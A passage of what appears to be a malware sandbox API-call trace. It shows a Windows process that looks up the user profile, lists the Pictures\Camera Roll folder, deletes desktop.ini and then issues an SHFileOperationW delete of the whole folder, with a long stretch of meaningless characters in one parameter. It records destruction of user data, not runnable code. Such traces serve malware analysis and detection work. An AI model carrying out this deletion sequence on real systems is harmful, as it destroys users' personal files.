lpFilePart=0x8cedf4*="Camera Roll") returned 0x24 [0209.166] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll")) returned 0x11 [0209.166] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e21f8 [0209.166] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0209.166] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.166] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\desktop.ini")) returned 1 [0209.167] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0209.167] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0209.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.168] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.168] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0209.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.169] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eb268 [0209.170] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Camera Roll", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpFilePart=0x8cf650*="Camera Roll") returned 0x24 [0209.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb268 | out: hHeap=0x2af0000) returned 1 [0209.170] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll")) returned 0x11 [0209.170] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.422] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0209.422] TranslateMessage (lpMsg=0x8cf968) returned 0 [0209.422] DispatchMessageW (lpMsg=0x8cf968) returned 